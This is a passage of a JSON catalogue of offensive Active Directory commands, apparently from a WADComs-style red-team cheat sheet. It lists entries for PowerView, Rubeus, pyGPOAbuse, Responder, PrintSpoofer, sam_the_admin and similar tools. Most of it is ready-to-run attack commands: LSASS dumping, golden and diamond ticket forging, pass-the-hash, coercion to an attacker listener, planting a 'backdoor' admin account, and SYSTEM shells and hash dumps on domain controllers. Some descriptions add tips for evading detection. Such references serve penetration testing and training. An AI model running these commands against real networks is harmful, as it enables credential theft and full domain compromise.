the domain head. Pair -Identity with -ResolveGUIDs to expand extended rights such as DS-Replication-Get-Changes (DCSync) or User-Force-Change-Password. This is the targeted follow-up to Find-InterestingDomainAcl when you already know the object you want to attack.\n\nCommand Reference:\n\n\tTarget object: Domain Admins\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/"],"added":true},{"id":"wadcoms:PowerView-GPOLocalGroup","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-GPOLocalGroup","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"Import-Module .\\PowerView.ps1\n# All GPOs in the domain\nGet-DomainGPO -Properties displayname,name\n# GPOs that modify local group membership\nGet-DomainGPOLocalGroup\n# Where does 'john' become a local Administrator via GPO?\nGet-DomainGPOUserLocalGroupMapping -Identity john -LocalGroup Administrators","description":"Get-DomainGPO enumerates every Group Policy Object in the domain, and Get-DomainGPOLocalGroup parses GPOs that use Restricted Groups or Group Policy Preferences to set local group membership (for example local Administrators). Get-DomainGPOUserLocalGroupMapping then resolves which machines a given user or group ends up as local admin on through those GPOs. Together they map the GPO-to-local-admin relationships needed for lateral movement and for finding GPOs worth abusing.\n\nCommand Reference:\n\n\tUsername: john\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993"],"added":true},{"id":"wadcoms:PowerView-InterestingDomainAcl","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-InterestingDomainAcl","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Privilege Escalation"],"nativeCategory":["Discovery","PrivEsc"],"command":"Import-Module .\\PowerView.ps1\nFind-InterestingDomainAcl -ResolveGUIDs |\n ? { $_.IdentityReferenceName -eq 'john' } |\n select ObjectDN, ActiveDirectoryRights, IdentityReferenceName","description":"Find-InterestingDomainAcl surfaces ACEs across the domain that grant modification rights (GenericAll, GenericWrite, WriteDacl, WriteOwner, ResetPassword, etc.) to non-built-in principals, which are the ACL-based privilege escalation paths. The -ResolveGUIDs switch translates extended-right and property-set object GUIDs into human-readable names so DCSync and ForceChangePassword rights are legible. Filtering the output to your controlled principals quickly reveals abusable edges.\n\nCommand Reference:\n\n\tUsername: john","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://www.thehacker.recipes/ad/movement/dacl/","https://wald0.com/?p=112"],"added":true},{"id":"wadcoms:PowerView-InvokeUserHunter","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-InvokeUserHunter","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Lateral Movement"],"nativeCategory":["Discovery","Lateral Movement"],"command":"Import-Module .\\PowerView.ps1\n# Hunt for any Domain Admin session, flag where we already have admin\nInvoke-UserHunter -GroupName 'Domain Admins' -CheckAccess\n# Quieter variant: only query likely session hosts\nInvoke-UserHunter -GroupName 'Domain Admins' -Stealth","description":"Invoke-UserHunter finds machines where a target user (or members of a target group such as Domain Admins) is logged in or has an active session, by combining Get-NetSession, Get-NetLoggedon, and Get-NetComputer across the domain. Adding -CheckAccess also reports whether you already have local admin on the hosts where the target is present, marking immediate credential-theft opportunities. Use -Stealth to only query high-value session hosts (DCs, file servers) and reduce noise.\n\nCommand Reference:\n\n\tTarget group: Domain Admins","mitre":[],"requires":["PowerShell"],"services":["SMB"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:PowerView-Kerberoastable-SPN","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-Kerberoastable-SPN","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Import PowerView into the current session first\nImport-Module .\\PowerView.ps1\n# List every account with an SPN (kerberoastable)\nGet-DomainUser -SPN -Properties samaccountname,serviceprincipalname | Out-File output.txt","description":"PowerView's Get-DomainUser -SPN enumerates domain user accounts that have a servicePrincipalName set, which are the candidates for Kerberoasting. Run it from an existing domain-joined foothold shell to build a target list before requesting service tickets. It only queries LDAP and does not request any TGS, so it is quiet on its own; the noisy step is the later roast.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tOutput file: output.txt","mitre":[],"requires":["PowerShell"],"services":["LDAP","Kerberos"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast"],"added":true},{"id":"wadcoms:PowerView-SetDomainObjectOwner","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-SetDomainObjectOwner","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Persistence"],"nativeCategory":["PrivEsc","Persistence"],"command":"Import-Module .\\PowerView.ps1\n# Take ownership of the target, then we can rewrite its DACL\nSet-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity john -Verbose\nAdd-DomainObjectAcl -TargetIdentity 'Domain Admins' -PrincipalIdentity john -Rights All","description":"Set-DomainObjectOwner changes the owner of an AD object to a principal you control. When you hold WriteOwner over a target, taking ownership lets you then write its DACL (via Add-DomainObjectAcl) and grant yourself full control, chaining a limited ACE into complete object takeover. This is the classic first step of a WriteOwner-to-GenericAll escalation against a privileged group or user.\n\nCommand Reference:\n\n\tNew owner: john\n\n\tTarget object: Domain Admins","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/"],"added":true},{"id":"wadcoms:pre2k-Auth","toolId":"wadcoms:pre2k","toolName":"pre2k","name":"pre2k Authenticated Enumeration","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery","Credential Access"],"nativeCategory":["Discovery","Credential Access"],"command":"pre2k auth -d test.local -u john -p password123 -dc-ip 10.10.10.1 -save","description":"In auth mode pre2k uses valid domain credentials to query LDAP for computer objects whose userAccountControl still flags them as pre-created (pwdLastSet == 0 / never logged on) and sprays the lowercase-name password against each. This finds pre-Windows 2000 accounts that are still active and abusable directly from an existing foothold, avoiding blind guessing. Add -targeted to focus on accounts with no lastlogontimestamp and -save to grab a TGT for each hit.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP","Kerberos"],"references":["https://github.com/garrettfoster13/pre2k","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:pre2k-Unauth","toolId":"wadcoms:pre2k","toolName":"pre2k","name":"pre2k Unauthenticated Spray","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Discovery"],"nativeCategory":["Credential Access","Discovery"],"command":"pre2k unauth -d test.local -dc-ip 10.10.10.1 -inputfile output.txt -save","description":"pre2k (Garrett Foster) abuses pre-Windows 2000 pre-created computer accounts, whose password is the lowercase of the sAMAccountName without the trailing dollar sign (e.g. account WORKSTATION01$ has password 'workstation01'). In unauth mode it takes a list of candidate machine names (recovered from a null LDAP/RPC bind or enumeration) and Kerberos pre-auth sprays them, requiring no domain credentials. Use -save to request and store a TGT (.ccache) for any account that authenticates, giving an initial foothold.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tDC IP: 10.10.10.1\n\n\tInput file: output.txt","mitre":[],"requires":["No_Creds"],"services":["Kerberos","LDAP"],"references":["https://github.com/garrettfoster13/pre2k","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:PrinterBug-printerbug","toolId":"wadcoms:PrinterBug","toolName":"PrinterBug","name":"PrinterBug-printerbug","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 printerbug.py test.local/john:password123@10.10.10.1 10.10.10.2","description":"printerbug.py (shipped with dirkjanm's krbrelayx toolkit) abuses the MS-RPRN Print System Remote Protocol (the SpoolSample / PrinterBug technique) by calling RpcRemoteFindFirstPrinterChangeNotificationEx on the target's spooler service, forcing the target machine account to authenticate back to an attacker-controlled host over SMB or HTTP. The captured machine-account authentication is then relayed with ntlmrelayx or krbrelayx (e.g. for RBCD or ADCS abuse). The target is given as a domain/user:password@target connection string followed by the attacker host. Requires a valid domain account and a running Print Spooler on the target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/dirkjanm/krbrelayx","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"],"added":true},{"id":"wadcoms:PrintSpoofer-SeImpersonate","toolId":"wadcoms:PrintSpoofer","toolName":"PrintSpoofer","name":"PrintSpoofer-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Spawn an interactive SYSTEM shell in the current console\nPrintSpoofer64.exe -i -c cmd\n\n# Or run a single payload as SYSTEM (non-interactive)\nPrintSpoofer64.exe -c \"C:\\Windows\\System32\\cmd.exe /c whoami > C:\\output.txt\"","description":"PrintSpoofer abuses SeImpersonatePrivilege held by service accounts (IIS AppPool, MSSQL, etc.) to escalate to SYSTEM. It coerces the local Print Spooler service to authenticate to an attacker-controlled named pipe (\\\\pipe\\\\spoolss) via MS-RPRN, captures the SYSTEM token with ImpersonateNamedPipeClient, and uses CreateProcessAsUser/WithTokenW to spawn a process. Use it when you land as a low-privileged service account whose token shows SeImpersonatePrivilege enabled; it works on Windows 10 / Server 2016-2019 where JuicyPotato's DCOM path was patched. Requires the Print Spooler service running and the SeImpersonate (or SeAssignPrimaryToken) privilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege","mitre":[],"requires":["Shell"],"services":["RPC"],"references":["https://github.com/itm4n/PrintSpoofer","https://itm4n.github.io/printspoofer-abusing-impersonation-privileges/","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"added":true},{"id":"wadcoms:Procdump-LSASS","toolId":"wadcoms:Procdump","toolName":"Procdump","name":"Procdump-LSASS","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"procdump.exe -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass.dmp","description":"Procdump is a signed Microsoft Sysinternals utility, so it often survives application allowlisting and looks benign on disk while still producing a full LSASS memory dump. The -ma flag writes a complete dump (all memory) of lsass.exe and -accepteula suppresses the license prompt for non-interactive use. It needs administrator rights with SeDebugPrivilege; copy the .dmp off-host and extract credentials with pypykatz or Mimikatz sekurlsa::minidump.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true},{"id":"wadcoms:pyGPOAbuse-ScheduledTask","toolId":"wadcoms:pyGPOAbuse","toolName":"pyGPOAbuse","name":"pyGPOAbuse-ScheduledTask","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Lateral Movement","Execution"],"nativeCategory":["PrivEsc","Lateral Movement","Exploitation"],"command":"# With a password: add a local admin user via an immediate scheduled task\npython3 pygpoabuse.py test.local/john:password123 -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\" \\\n -dc-ip 10.10.10.1 \\\n -taskname \"SecurityUpdate\" \\\n -command 'net user backdoor P@ssw0rd /add && net localgroup Administrators backdoor /add'\n\n# Pass-the-hash variant\npython3 pygpoabuse.py test.local/john -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\" -dc-ip 10.10.10.1","description":"pyGPOAbuse is a partial Linux/Python implementation of SharpGPOAbuse that abuses write access to a GPO by adding an immediate scheduled task to its Machine (or User) preferences, executing an arbitrary command as SYSTEM on hosts in scope at the next policy refresh. You authenticate with a password or NT hash and target the GPO by its GUID (-gpo-id), which you can obtain from PowerView's Get-DomainGPO or ldapsearch. It is ideal when operating from a Linux box with no Windows tooling; use --cleanup afterwards to remove the planted task.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n\n\tDC IP: 10.10.10.1","mitre":["T1484.001"],"requires":["Username","Password","Hash"],"services":["LDAP","SMB"],"references":["https://github.com/Hackndo/pyGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"added":true},{"id":"wadcoms:Pypykatz-Minidump","toolId":"wadcoms:Pypykatz","toolName":"Pypykatz","name":"Pypykatz-Minidump","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"pypykatz lsa minidump lsass.dmp -o output.txt","description":"Pypykatz is a pure-Python reimplementation of Mimikatz's sekurlsa module that parses an LSASS minidump entirely offline, so credentials can be extracted on the operator's Linux box without running Mimikatz on the target. Feed it any dump produced by nanodump, comsvcs.dll MiniDump, or procdump to recover NT hashes, Kerberos keys, and cached plaintexts. This keeps the noisy parsing off the victim host and out of reach of host EDR.\n\nCommand Reference:\n\n\tInput dump: lsass.dmp\n\n\tOutput file: output.txt","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://github.com/skelsec/pypykatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true},{"id":"wadcoms:Responder-Poisoning","toolId":"wadcoms:Responder","toolName":"Responder","name":"Responder-Poisoning","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection","Execution"],"nativeCategory":["Credential Access","Collection","Exploitation"],"command":"# Actively poison LLMNR/NBT-NS/mDNS and serve rogue WPAD to capture NetNTLM hashes\nsudo responder -I eth0 -wv","description":"Responder is an LLMNR, NBT-NS, and mDNS poisoner. Run without the analyze flag, it actively answers name-resolution broadcasts (LLMNR, NBT-NS, mDNS) with the attacker's IP, causing victims to connect to Responder's rogue SMB/HTTP/etc. servers and disclose NTLMv1/NTLMv2 challenge-response hashes, which are captured to logs for offline cracking. The -w flag starts the rogue WPAD proxy to poison web-proxy autodiscovery, and -d answers DHCP requests. Captured hashes can be cracked with hashcat or, instead of cracking, forwarded live to ntlmrelayx.py (disable Responder's SMB and HTTP servers in Responder.conf when relaying). This is a noisy, active on-network attack.\n\nCommand Reference:\n\n\tInterface: eth0\n\n\tCaptured hashes log: hashes.txt","mitre":["T1557.001"],"requires":["No_Creds"],"services":["NTLM","SMB"],"references":["https://github.com/lgandx/Responder","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing","https://attack.mitre.org/techniques/T1557/001/"],"added":true},{"id":"wadcoms:RoguePotato-SeImpersonate","toolId":"wadcoms:RoguePotato","toolName":"RoguePotato","name":"RoguePotato-SeImpersonate","source":"DAEMON","platform":["Windows","Linux","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# On the attacker (Linux): redirect inbound 135 back to the RoguePotato listener on the target\nsocat tcp-listen:135,reuseaddr,fork tcp:10.10.10.1:9999\n\n# On the target (Windows): -r remote OXID resolver, -e command, -l listener port\nRoguePotato.exe -r 10.10.10.2 -e \"C:\\Windows\\System32\\cmd.exe /c whoami\" -l 9999","description":"RoguePotato bypasses the JuicyPotato mitigation by redirecting the DCOM/RPC OXID resolution to a remote resolver the attacker controls on port 135, which forces a SYSTEM authentication that RoguePotato impersonates. Because outbound 135 to the internet is usually blocked and the target queries the resolver on 135, run a socat redirector on the attacker host that forwards 135 to the RoguePotato listener port (-l) on the target. Works on Windows 10 / Server 2016-2019. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tAttacker/Listener IP: 10.10.10.2\n\n\tTarget IP: 10.10.10.1\n\n\tOXID resolver / listen port: 9999","mitre":[],"requires":["Shell"],"services":["DCOM","RPC"],"references":["https://github.com/antonioCoco/RoguePotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"added":true},{"id":"wadcoms:Rubeus-Describe","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Describe","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"# Parse and describe a ticket offline\nRubeus.exe describe /ticket:ticket.kirbi","description":"Rubeus describe parses a ticket (TGT or service ticket) and prints its metadata: user, realm, service name, encryption type, flags, start/end/renew-till times and the session key. It does not touch the network, making it a safe way to inspect captured or forged tickets before use. Supplying a service/krbtgt key allows it to also decrypt and display the embedded PAC.\n\nCommand Reference:\n\n\tTicket file: ticket.kirbi","mitre":[],"requires":["TGT"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:Rubeus-DiamondTicket","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-DiamondTicket","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Defense Evasion","Execution"],"nativeCategory":["Persistence","Defense Evasion","Exploitation"],"command":"# Forge a diamond TGT: request a real TGT as 'john', then re-sign the PAC as administrator (RID 500).\n# /krbkey is the krbtgt AES256 key.\nRubeus.exe diamond /creduser:john /credpassword:password123 /krbkey:5db474e563f34e4bb62e04eecd4a6f92 /ticketuser:administrator /ticketuserid:500 /groups:512 /nowrap","description":"Rubeus diamond forges a diamond ticket by requesting a real TGT for a valid account, decrypting it with the krbtgt key, modifying the embedded PAC (user, RID, groups, extra SIDs) and re-encrypting it. Unlike a golden ticket it is derived from a legitimate KDC-issued TGT, so its metadata is internally consistent and far harder to distinguish from genuine tickets. Requires valid credentials for the request plus the krbtgt AES/NT key to re-sign the PAC.\n\nCommand Reference:\n\n\tUsername: john\n\n\tPassword: password123\n\n\tAES256 krbtgt key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain: test.local","mitre":[],"requires":["AES_Key","Username","Password"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/diamond-ticket","https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond"],"added":true},{"id":"wadcoms:Rubeus-Dump","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Dump","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# Dump all TGTs from LSA (elevated dumps every session)\nRubeus.exe dump /service:krbtgt /nowrap","description":"Rubeus dump extracts Kerberos tickets from LSA memory. When elevated it dumps tickets for every logon session on the host; unelevated it returns only the current user's tickets. Filters let you target a specific service (e.g. krbtgt for TGTs) or LUID, and /nowrap keeps the base64 on a single line for easy copy-out and reuse via ptt.\n\nCommand Reference:\n\n\tService filter: krbtgt","mitre":["T1558"],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://attack.mitre.org/techniques/T1558/"],"added":true},{"id":"wadcoms:Rubeus-GoldenTicket-AES","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-GoldenTicket-AES","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Execution"],"nativeCategory":["Persistence","Exploitation"],"command":"# Forge an AES256 golden ticket for the built-in administrator (RID 500)\nRubeus.exe golden /aes256:5db474e563f34e4bb62e04eecd4a6f92 /user:administrator /id:500 /domain:test.local /sid:S-1-5-21-1339291983-1349129144-367733775 /nowrap","description":"Rubeus golden forges a TGT signed with the domain krbtgt key, granting arbitrary identity and group membership across the domain until the krbtgt password is rotated twice. Supplying the krbtgt AES256 key with /aes256 produces an AES-encrypted ticket, avoiding the RC4 golden tickets that modern detections flag. Requires the krbtgt key, the domain SID, and typically privileged access to have obtained the key via DCSync.\n\nCommand Reference:\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tUsername: administrator\n\n\tDomain: test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775","mitre":["T1558.001"],"requires":["AES_Key"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket","https://attack.mitre.org/techniques/T1558/001/"],"added":true},{"id":"wadcoms:Rubeus-Harvest","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Harvest","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection","Persistence"],"nativeCategory":["Credential Access","Collection","Persistence"],"command":"# Harvest TGTs every 30s and auto-renew them up to their renew-till limit\nRubeus.exe harvest /interval:30 /nowrap","description":"Rubeus harvest monitors for new TGTs and automatically renews them before they expire, keeping a working cache of live tickets that can be extracted and reused. It combines the monitor behavior with auto-renewal, which is valuable during long engagements to avoid losing captured tickets to the default 10-hour lifetime. Elevation is required to harvest tickets for all logon sessions.\n\nCommand Reference:\n\n\tMonitor interval: 30 seconds","mitre":["T1558"],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://www.thehacker.recipes/ad/movement/kerberos/ptt","https://attack.mitre.org/techniques/T1558/"],"added":true},{"id":"wadcoms:Rubeus-Monitor","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Monitor","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"# Poll every 5 seconds for newly captured TGTs, filtered to one user\nRubeus.exe monitor /interval:5 /filteruser:john /nowrap","description":"Rubeus monitor continuously watches for new Kerberos TGTs as users authenticate to the host, printing any captured tickets on a fixed interval. It is most useful on servers where privileged accounts or delegation targets log on, letting an operator harvest fresh TGTs for pass-the-ticket. Requires an elevated context to see tickets for other logon sessions.\n\nCommand Reference:\n\n\tUsername: john","mitre":["T1558"],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://www.thehacker.recipes/ad/movement/kerberos/ptt","https://attack.mitre.org/techniques/T1558/"],"added":true},{"id":"wadcoms:Rubeus-OverPassTheHash","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-OverPassTheHash","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Lateral Movement","Credential Access"],"nativeCategory":["Lateral Movement","Credential Access"],"command":"# Over-pass-the-hash: turn an AES256 key into a live TGT and inject it\nRubeus.exe asktgt /user:john /aes256:5db474e563f34e4bb62e04eecd4a6f92 /domain:test.local /dc:dc.test.local /ptt /nowrap","description":"Over-pass-the-hash (pass-the-key) uses a captured AES or NT key to request a legitimate TGT for that user directly from the KDC, converting a stolen key into full Kerberos access without ever knowing the plaintext password. Using the AES256 key with /aes256 avoids the RC4 (etype 23) downgrade that mature environments alert on, making it more OPSEC-safe than /rc4. The /ptt flag injects the resulting TGT for immediate lateral movement.\n\nCommand Reference:\n\n\tUsername: john\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain: test.local\n\n\tDomain Controller host: dc.test.local","mitre":[],"requires":["AES_Key","Username"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:Rubeus-Ptt","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Ptt","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Lateral Movement","Defense Evasion"],"nativeCategory":["Lateral Movement","Defense Evasion"],"command":"# Inject a .kirbi ticket into the current session\nRubeus.exe ptt /ticket:ticket.kirbi\n\n# Or target a specific logon session by LUID (requires elevation)\nRubeus.exe ptt /ticket:ticket.kirbi /luid:0x3e7","description":"Rubeus ptt performs a pass-the-ticket by submitting a base64 or .kirbi ticket into the current logon session (or a target LUID when elevated). Once injected the ticket is used transparently by Windows for Kerberos authentication to remote services such as SMB, LDAP or WinRM. Use it after obtaining a TGT/TGS via tgtdeleg, dump, monitor, kerberoast/s4u, or Impacket ticketConverter output.\n\nCommand Reference:\n\n\tTicket file: ticket.kirbi","mitre":[],"requires":["TGT"],"services":["Kerberos","SMB","LDAP"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:Rubeus-Renew","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Renew","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Credential Access"],"nativeCategory":["Persistence","Credential Access"],"command":"# Renew a TGT from a .kirbi file and inject it, auto-renewing to the renew-till limit\nRubeus.exe renew /ticket:ticket.kirbi /dc:dc.test.local /autorenew /ptt /nowrap","description":"Rubeus renew submits a renewal request for an existing TGT to the KDC, returning a fresh ticket with an extended validity window. It accepts either a base64 blob or a .kirbi file and can auto-renew repeatedly up to the ticket's renew-till limit, which helps maintain access without re-authenticating. Combine with /ptt to inject the renewed ticket into the current session.\n\nCommand Reference:\n\n\tDomain Controller host: dc.test.local","mitre":[],"requires":["TGT"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://www.thehacker.recipes/ad/movement/kerberos/ptt","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket"],"added":true},{"id":"wadcoms:Rubeus-TgtDeleg","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-TgtDeleg","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# Extract a usable TGT (.kirbi + session key) for the current user, no elevation needed\nRubeus.exe tgtdeleg /nowrap","description":"Rubeus tgtdeleg abuses the Kerberos GSS-API delegation mechanism to obtain a usable TGT (including its session key) for the current user context without requiring local administrator rights. It requests a service ticket for a target SPN with the delegation flag set, then extracts the forwarded TGT that the KDC embeds, yielding a .kirbi that can be passed to another host. Use it for pass-the-ticket from an unprivileged foothold when you cannot dump LSASS.\n\nCommand Reference:\n\n\tDomain Controller host: dc.test.local","mitre":[],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/unconstrained-delegation","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:sam-the-admin","toolId":"wadcoms:sam","toolName":"sam","name":"sam_the_admin (sAMAccountName Spoofing)","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Credential Access"],"nativeCategory":["PrivEsc","Exploitation","Credential Access"],"command":"# SYSTEM shell on the DC\npython3 sam_the_admin.py \"test.local/john:password123\" -dc-ip 10.10.10.1 -shell\n\n# Dump domain hashes\npython3 sam_the_admin.py \"test.local/john:password123\" -dc-ip 10.10.10.1 -dump","description":"WazeHell's sam_the_admin.py is a self-contained implementation of the CVE-2021-42278 + CVE-2021-42287 chain. It creates a computer account, spoofs its sAMAccountName to impersonate the DC machine account, and automatically impersonates the Administrator to obtain a privileged ticket. Requires MachineAccountQuota > 0 and an unpatched DC. Pass -shell for a semi-interactive SYSTEM shell on the DC or -dump to run secretsdump; the account only needs valid domain credentials (no special privileges).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["Kerberos","SMB","LDAP"],"references":["https://github.com/WazeHell/sam-the-admin","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"],"added":true},{"id":"wadcoms:ShadowCoerce","toolId":"wadcoms:ShadowCoerce","toolName":"ShadowCoerce","name":"ShadowCoerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 shadowcoerce.py -d test.local -u john -p password123 10.10.10.2 10.10.10.1","description":"ShadowCoerce abuses the MS-FSRVP (File Server Remote VSS Protocol) RPC interface to coerce a target host into authenticating to an attacker-controlled listener. MS-FSRVP is exposed when the File Server VSS Agent Service feature is installed, so the vector is more situational than PrinterBug or PetitPotam, but it remained exploitable after some EFSRPC patches. The listener is supplied first and the target second, matching the PetitPotam-style argument order. Provide a valid domain account or NT hash.\n\nCommand Reference:\n\n\tTarget 